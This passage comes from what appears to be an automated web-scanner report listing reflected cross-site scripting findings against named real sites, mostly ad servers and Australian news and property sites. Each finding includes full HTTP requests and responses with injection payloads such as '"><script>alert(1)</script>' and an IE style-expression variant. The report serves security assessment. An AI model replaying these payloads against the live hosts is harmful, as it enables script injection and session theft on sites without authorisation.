Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad-apac.doubleclick.net/adi/onl.smh.news/news/homepage;cat1=homepage;cat=news;ctype=index;pos=2;sz=300x250;tile=8;ord=96026626?
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ib.adnxs.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: sess=1; anj=Kfu=8fG3x=E:3F.0s]#%2L_'x%SEV/i#-pc=G#<hF[085K80?=O$KqY+(W^sKvh:SKd8e:HDCurJCPLQBXnZ9d'?)K3sioph.s=s((NS'@%9_V3:tjxoAg.6sF[JLjIdkWe5:3'3PU%4UXg_8gT!dKqx[BbcKHJ6D3g1GQ/=$ajGg9AZal%>*Hjj`TZJ@YC0AEbC+t+[adDw@>)>AN?$aCK%p05)$pe.]*wBDTulo^l%yp1_g?Jo/G#T-ukLV>#!0fjkO+gqS; uuid2=5675696235378120575

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 23-Nov-2010 23:12:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: anj=Kfu=8fG3x=E:3F.0s]#%2L_'x%SEV/i#-pc=G#<hF[085K80?=O$KqY+(W^sKvh:SKd8e:HDCurJCPLQBXnZ9d'?)K3sioph.s=s((NS'@%9_V3:tjxoAg.6sF[JLjIdkWe5:3'3PU%4UXg_8gT!dKqx[BbcKHJ6D3g1GQ/=$ajGg9AZal%>*Hjj`TZJ@YC0AEbC+t+[adDw@>)>AN?$aCK%p05)$pe.]*wBDTulo^l%yp1_g?Jo/G#T-ukLV>#!0fjkO+gqS; path=/; expires=Sun, 20-Feb-2011 23:12:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: cdata=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: cdata00=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: cdata01=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 22 Nov 2010 23:12:34 GMT
Content-Length: 999

<script type='text/javascript'>
var src = 'http://raw.oggifinogi.com/GetScript.aspx?oggiId=e5cd67d5-0a70-40ac-a355-6dfc957cd464&oggiWidth=300px&oggiHeight=250px&oggiCampaignId=79240ad6-5c53-4ac9-8c03-
...[SNIP]...
AIAAABb-gEAAQAAAFVTRABVU0QALAH6AKAGiQM2BQEBBQIEAAAAAADfIMzK/cnd=!vSoCsAip_AEQ2_QHGN8EIKcEKIkHMTaU19BQXgNAQhMIABAAGAAgASj-__________8BQhQI5C8QABgAIAMo_v__________AUIUCOQvEAAYACACKP7__________wFIAFAAWKAN55c1f'-alert(1)-'5aa21f25075/referrer=http%253A%252F%252Fwww.smh.com.au/clickenc=';
var site = location;
if (top.location != location){ src+='&oggiIsIframe=1'; site = document.referrer; if (site == '' || site == null){site = loca
...[SNIP]...

2.65. http://mig.nexac.com/2/B3DM/DLX/11473864102@x96 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/11473864102@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f3af"><script>alert(1)</script>cc8678fcf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM6f3af"><script>alert(1)</script>cc8678fcf0/DLX/11473864102@x96 HTTP/1.1
Host: mig.nexac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: na_tc=Y; OAX=rnoX2ky07x0ADVbJ; NSC_o4efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM6f3af"><script>alert(1)</script>cc8678fcf0/DLX/1061159350/x96/default/empty.gif/726e6f58326b7930377830414456624a?x" target="_top"><IMG SRC=
...[SNIP]...

2.66. http://mig.nexac.com/2/B3DM/DLX/11473864102@x96 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/11473864102@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ff98"><script>alert(1)</script>1b5f318601c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX4ff98"><script>alert(1)</script>1b5f318601c/11473864102@x96 HTTP/1.1
Host: mig.nexac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: na_tc=Y; OAX=rnoX2ky07x0ADVbJ; NSC_o4efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX4ff98"><script>alert(1)</script>1b5f318601c/1734822060/x96/default/empty.gif/726e6f58326b7930377830414456624a?x" target="_top"><IMG SRC
...[SNIP]...

2.67. http://mig.nexac.com/2/B3DM/DLX/11473864102@x96 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/11473864102@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbeab"><script>alert(1)</script>81924c6ef5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/11473864102@x96fbeab"><script>alert(1)</script>81924c6ef5f HTTP/1.1
Host: mig.nexac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: na_tc=Y; OAX=rnoX2ky07x0ADVbJ; NSC_o4efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 318
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX/910184449/x96fbeab"><script>alert(1)</script>81924c6ef5f/default/empty.gif/726e6f58326b7930377830414456624a?x" target="_top"><IMG SRC=
...[SNIP]...

2.68. http://mycareer.com.au/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mycareer.com.au
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d5fc"><script>alert(1)</script>50bf7a5b215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1d5fc"><script>alert(1)</script>50bf7a5b215=1 HTTP/1.1
Host: mycareer.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 95873
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=eds5ecy1i1gfcx55vuir1555; path=/; HttpOnly
Date: Mon, 22 Nov 2010 23:34:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU">
...[SNIP]...
<a href="/consumer/login.aspx?ReturnURL=/?1d5fc"><script>alert(1)</script>50bf7a5b215=1">
...[SNIP]...

2.69. http://perthnow.realestate.com.au/cgi-bin/rsearch [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://perthnow.realestate.com.au
Path:	/cgi-bin/rsearch

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7fbe"><script>alert(1)</script>7b1aa8772e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bind7fbe"><script>alert(1)</script>7b1aa8772e/rsearch HTTP/1.1
Host: perthnow.realestate.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 22 Nov 2010 23:59:12 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.realestate.com.au
X-Cache-Lookup: MISS from www.realestate.com.au:80
Via: 1.0 cache03 (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.rs.realestate.com.au/cgi-bind7fbe"><script>alert(1)</script>7b1aa8772e/rsearch" />
...[SNIP]...

2.70. http://perthnow.realestate.com.au/cgi-bin/rsearch [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://perthnow.realestate.com.au
Path:	/cgi-bin/rsearch

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6833"><script>alert(1)</script>543904f0ab6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/rsearcha6833"><script>alert(1)</script>543904f0ab6 HTTP/1.1
Host: perthnow.realestate.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 22 Nov 2010 23:59:16 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.realestate.com.au
X-Cache-Lookup: MISS from www.realestate.com.au:80
Via: 1.0 cache03 (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.rs.realestate.com.au/cgi-bin/rsearcha6833"><script>alert(1)</script>543904f0ab6" />
...[SNIP]...

2.71. http://perthnow.realestate.com.au/cgi-bin/rsearch [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://perthnow.realestate.com.au
Path:	/cgi-bin/rsearch

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea62b"><script>alert(1)</script>deffc608418 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/rsearch?ea62b"><script>alert(1)</script>deffc608418=1 HTTP/1.1
Host: perthnow.realestate.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 22 Nov 2010 23:59:07 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.realestate.com.au
X-Cache-Lookup: MISS from www.realestate.com.au:80
Via: 1.0 cache03 (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.rs.realestate.com.au/cgi-bin/rsearch?ea62b"><script>alert(1)</script>deffc608418=1" />
...[SNIP]...

2.72. http://rtb1.doubleverify.com/rtb.ashx/verifyc [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rtb1.doubleverify.com
Path:	/rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 63056<script>alert(1)</script>0e8400c1a03 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=647957&cmp=263234194&plc=263234194&sid=263234194&num=1&ver=2&dv_url=http%3A//www.smh.com.au/sport&callback=__verify_callback_68310335815663056<script>alert(1)</script>0e8400c1a03 HTTP/1.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAESo4vCCy9z-uR-F6FO4LQKZvmdNl8QhAZmZmZmZmHUC.yqFFtnMJQAAAAAAAAB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE.IZP.NwzCf5LQArDVZApJaajWYhZ2wevCYX1AAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D852829365%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c00f04bc-f68d-11df-a281-003048d6d270
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: rtb1.doubleverify.com
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 22 Nov 2010 23:11:44 GMT
Connection: close
Content-Length: 74

__verify_callback_68310335815663056<script>alert(1)</script>0e8400c1a03(2)

2.73. https://shop.bubble.com/preview/weekahead/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://shop.bubble.com
Path:	/preview/weekahead/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d753f"style%3d"x%3aexpression(alert(1))"bd1b01792cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d753f"style="x:expression(alert(1))"bd1b01792cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /preview/weekahead/?d753f"style%3d"x%3aexpression(alert(1))"bd1b01792cd=1 HTTP/1.1
Host: shop.bubble.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=q1zsb045wzyepw2gn4c4qa45; path=/; HttpOnly
Set-Cookie: bubGUID=dc43974b-e913-4ce6-9284-6228c8eec893; expires=Fri, 20-Nov-2020 00:02:07 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServedBy: w1
Date: Tue, 23 Nov 2010 00:02:07 GMT
Connection: close
Content-Length: 11562

<html>

<head>
<title>Jonathan Cainer's Five Star Preview</title>

<link href="/css/Styles.css" type="text/css" rel="stylesheet">

<style type="text/css"
...[SNIP]...
<a href="?sign=Aries&d753f"style="x:expression(alert(1))"bd1b01792cd=1">
...[SNIP]...

2.74. http://totalratings.community.theplatform.com/totalrating/metadata/TotalRating [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://totalratings.community.theplatform.com
Path:	/totalrating/metadata/TotalRating

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dde95<script>alert(1)</script>0d7de3743cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /totalratingdde95<script>alert(1)</script>0d7de3743cb/metadata/TotalRating HTTP/1.1
Host: totalratings.community.theplatform.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 23:55:31 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1438
Connection: close
Server: Jetty(6.1.19)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /totalratingdde95<script>alert(1)</script>0d7de3743cb/metadata/TotalRating. Reason:
<pre>
...[SNIP]...

2.75. http://totalratings.community.theplatform.com/totalrating/metadata/TotalRating [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://totalratings.community.theplatform.com
Path:	/totalrating/metadata/TotalRating

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 77562<script>alert(1)</script>669d1e03d33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /totalrating/metadata77562<script>alert(1)</script>669d1e03d33/TotalRating HTTP/1.1
Host: totalratings.community.theplatform.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 23:55:32 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1438
Connection: close
Server: Jetty(6.1.19)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /totalrating/metadata77562<script>alert(1)</script>669d1e03d33/TotalRating. Reason:
<pre>
...[SNIP]...

2.76. http://redcated/CNT/iview/194067505/direct [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://redcated
Path:	/CNT/iview/194067505/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fba5'%3b138b619d92a was submitted in the REST URL parameter 4. This input was echoed as 8fba5';138b619d92a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /CNT/iview/194067505/direct8fba5'%3b138b619d92a;wi.728;hi.90/01?click=http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.smh.com.au/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7526
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:26 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCP9/11_7_2010_ct_pt2/110710_22_UTV_THDVR_39_50B_TAG_728x90.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/194067505/direct8fba5';138b619d92a;wi.728;hi.90;ai.189501327;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/194067505/direct8fba5';138b619d92a;wi.728;hi.90;ai.189501327;ct.1/01" />
...[SNIP]...

2.77. http://redcated/CNT/iview/194067505/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/194067505/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f9a9"-alert(1)-"164e782bd1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/194067505/direct;wi.728;hi.90/01?click=http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=&6f9a9"-alert(1)-"164e782bd1b=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.smh.com.au/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7515
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:22 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...
5053814_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=&6f9a9"-alert(1)-"164e782bd1b=1",
clickThruUrl: "http://clk.redcated/go/194067505/direct;wi.728;hi.90;ai.189501327;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_
...[SNIP]...

2.78. http://redcated/CNT/iview/194067505/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/194067505/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7627"><script>alert(1)</script>09b34dd96aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/194067505/direct;wi.728;hi.90/01?click=http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=&f7627"><script>alert(1)</script>09b34dd96aa=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.smh.com.au/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7591
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:21 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...
9501327;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=&f7627"><script>alert(1)</script>09b34dd96aa=1\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=&f7627">
...[SNIP]...

2.79. http://redcated/CNT/iview/194067505/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/194067505/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87aa4'-alert(1)-'e76ab0c0bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/194067505/direct;wi.728;hi.90/01?click=http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=&87aa4'-alert(1)-'e76ab0c0bb=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.smh.com.au/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7510
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:22 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...
